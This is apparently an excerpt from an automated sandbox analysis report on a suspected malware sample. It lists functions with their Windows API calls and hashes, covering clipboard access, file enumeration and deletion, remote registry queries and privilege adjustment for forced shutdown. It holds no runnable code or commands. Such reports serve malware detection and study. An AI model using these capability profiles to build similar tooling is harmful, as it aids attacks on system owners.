                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 420908878-0
                                                                                                                                                                                                                                                                              • Opcode ID: 7509d1add62923fef4b0fb07d6ce7ceeb4b59884492724d348901a61a589ac1f
                                                                                                                                                                                                                                                                              • Instruction ID: e9125b0bcb7d59067bfd99dbeb2d03bd126ed0d852e6fe104f68481436ffbf35
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7509d1add62923fef4b0fb07d6ce7ceeb4b59884492724d348901a61a589ac1f
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4161EF31204205AFD310EF20E898F2AB7A5AF84354F24846DF947C72E2DB39ED45CB66
                                                                                                                                                                                                                                                                              Function 007673D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00767403
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00767457
                                                                                                                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00767493
                                                                                                                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007674BA
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 007674F7
                                                                                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00767524
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                              • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                              • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                              • Opcode ID: e66f8a57b10afc53006fb46344a64704c5f8f80e6583a5f68e0c9cad499e7bd2
                                                                                                                                                                                                                                                                              • Instruction ID: 1044d8fe5e2fcf106c7becc7e015149eefb5a008fef4052d10e5e5186bfa16dd
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e66f8a57b10afc53006fb46344a64704c5f8f80e6583a5f68e0c9cad499e7bd2
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFD171B2508348AEC354EB64C845EBFB7EDAF88704F40491DF685D7192EB78DA44CB62
                                                                                                                                                                                                                                                                              Function 0076A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0076A0A8
                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 0076A0E6
                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 0076A100
                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0076A118
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0076A123
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0076A13F
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0076A18F
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(007B7B94), ref: 0076A1AD
                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0076A1B7
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0076A1C4
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0076A1D4
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                                                                                              • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                              • Opcode ID: d699033ea9a49cda9d522f8990d1ac69716394c9250aadb8b941c9cd3e034481
                                                                                                                                                                                                                                                                              • Instruction ID: a0cd5cf4e925a726f6aece13e8265cd8fe8c4b3745373f88517ce6b62c23ce22
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d699033ea9a49cda9d522f8990d1ac69716394c9250aadb8b941c9cd3e034481
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7231B07164021DBADB28ABA4DC49ADE73BDAF46360F104095EC16E20D0EB7CDE858F65
                                                                                                                                                                                                                                                                              Function 00764763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00764785
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 007647B2
                                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 007647E2
                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00764803
                                                                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 00764813
                                                                                                                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0076489A
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 007648A5
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 007648B0
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                              • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                              • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                              • Opcode ID: 7b038a8a060f90506bbc6c9126d76575a6f900c8e9f56aa4486583a486f03da2
                                                                                                                                                                                                                                                                              • Instruction ID: ed82223de354d89aaf233d1ac581f486bf9869babf8994fa6172952956fcbf89
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b038a8a060f90506bbc6c9126d76575a6f900c8e9f56aa4486583a486f03da2
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF31C67154014AABDB219FA0DC49FEB37BCEF89740F2041B6F909D30A0E7789A448B64
                                                                                                                                                                                                                                                                              Function 0076A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0076A203
                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0076A25E
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0076A269
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0076A285
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0076A2D5
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(007B7B94), ref: 0076A2F3
                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0076A2FD
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0076A30A
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0076A31A
                                                                                                                                                                                                                                                                                • Part of subcall function 0075E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0075E3B4
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                                                                                              • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                              • Opcode ID: bf488fa0698df4a4e2447ff455acbe9897e4ab1b0a76f1014bc9f2dbc238396d
                                                                                                                                                                                                                                                                              • Instruction ID: 8201fa86d1f784eff9580fda7d45569ec08fa77dbcfd3631dfa41a7eed91e15c
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf488fa0698df4a4e2447ff455acbe9897e4ab1b0a76f1014bc9f2dbc238396d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A31E07154021ABECF24AFA5DC49ADE77A9AF85320F204191E811B21D0DB39DE85CF25
                                                                                                                                                                                                                                                                              Function 0077C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0077C10E,?,?), ref: 0077D415
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D451
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D4C8
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D4FE
                                                                                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077C99E
                                                                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0077CA09
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0077CA2D
                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0077CA8C
                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0077CB47
                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0077CBB4
                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0077CC49
                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0077CC9A
                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0077CD43
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0077CDE2
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0077CDEF
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                              • Opcode ID: 91c4360bf98e359adc2cc9252ed6a79e92615714c08d83f061f9c443eadfcf39
                                                                                                                                                                                                                                                                              • Instruction ID: c15e981f6e5bb90d86032029f009128b395176d5c5d3f096c6178640a32da5d7
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91c4360bf98e359adc2cc9252ed6a79e92615714c08d83f061f9c443eadfcf39
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67027F71604204AFCB25CF28C895E2ABBE5EF49354F18C49DF849CB2A2DB35EC42CB51
                                                                                                                                                                                                                                                                              Function 0075D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006F55D1,?,?,00734B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 006F5871
                                                                                                                                                                                                                                                                                • Part of subcall function 0075EAB0: GetFileAttributesW.KERNEL32(?,0075D840), ref: 0075EAB1
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0075D9CD
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0075DA88
                                                                                                                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 0075DA9B
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 0075DAB8
                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0075DAE2
                                                                                                                                                                                                                                                                                • Part of subcall function 0075DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0075DAC7,?,?), ref: 0075DB5D
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?), ref: 0075DAFE
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0075DB0F
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                                                                                              • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                              • Opcode ID: 39240e7cfcbebd4f830745093ffb4a13d1b8450971ffebb5eacd0fd46fc1fbb8
                                                                                                                                                                                                                                                                              • Instruction ID: 2b294505829bf6b206bc8e5cc9de45cc0a9be42ed1d531f0f679569465ba6002
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39240e7cfcbebd4f830745093ffb4a13d1b8450971ffebb5eacd0fd46fc1fbb8
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F614D3180510DAECF25EBA0C9569FDB7B6AF14301F2080A9E90277195DB796F0DCB55
                                                                                                                                                                                                                                                                              Function 0076F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                              • Opcode ID: 93bea273878df8e10d9cb073b05a07b14b9f563425c8c2e2206a61246a173f87
                                                                                                                                                                                                                                                                              • Instruction ID: b4dcd621a50570653c80cecb544bb3c849529817dd9dac0b6ba17427d2f9fe21
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93bea273878df8e10d9cb073b05a07b14b9f563425c8c2e2206a61246a173f87
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94418031604616AFD720DF15E488F157BE5FF44358F24C4ADE81A8B6A2CB39ED42CB94
                                                                                                                                                                                                                                                                              Function 0075F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00752010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0075205A
                                                                                                                                                                                                                                                                                • Part of subcall function 00752010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00752087
                                                                                                                                                                                                                                                                                • Part of subcall function 00752010: GetLastError.KERNEL32 ref: 00752097
                                                                                                                                                                                                                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 0075F249
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                              • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                              • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                              • Opcode ID: 3b85fa122af8c1b4b320729fb63c6e2d300038e268a4b4abe2fc0bf49e6abe68
                                                                                                                                                                                                                                                                              • Instruction ID: ecc0173a25e44c05060cdd8511c582f9c0071054ba4bf61b11581d1f35c60744
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b85fa122af8c1b4b320729fb63c6e2d300038e268a4b4abe2fc0bf49e6abe68
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A001DBB66512146BFB2462B89C89FFF735CBB08346F154531FD03E21D1D5AC5D089690
                                                                                                                                                                                                                                                                              Function 006F22AD Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 308COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DefDlgProcW.USER32(?,?), ref: 006F233E
                                                                                                                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 006F2421
                                                                                                                                                                                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 006F2434
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Color$Proc
                                                                                                                                                                                                                                                                              • String ID: (|
                                                                                                                                                                                                                                                                              • API String ID: 929743424-3772712737
                                                                                                                                                                                                                                                                              • Opcode ID: 5e2dd470fb20a9aa335a919a2a790a19fff0bfa4cd9ae14ecf0b4d0a15cde64e
                                                                                                                                                                                                                                                                              • Instruction ID: a28b9cac2899d34b8ead038714dc96555a5faad71f1f4d55ef0d6c02e287f5b2
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e2dd470fb20a9aa335a919a2a790a19fff0bfa4cd9ae14ecf0b4d0a15cde64e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5981E3F214440DBAF23966388CBDEBF269FEB42300F154109F302DA696C95E9F429776
                                                                                                                                                                                                                                                                              Function 007520AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00751900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00751916
                                                                                                                                                                                                                                                                                • Part of subcall function 00751900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00751922
                                                                                                                                                                                                                                                                                • Part of subcall function 00751900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00751931
                                                                                                                                                                                                                                                                                • Part of subcall function 00751900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00751938
                                                                                                                                                                                                                                                                                • Part of subcall function 00751900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0075194E
                                                                                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?,00000000,00751C81), ref: 007520FB
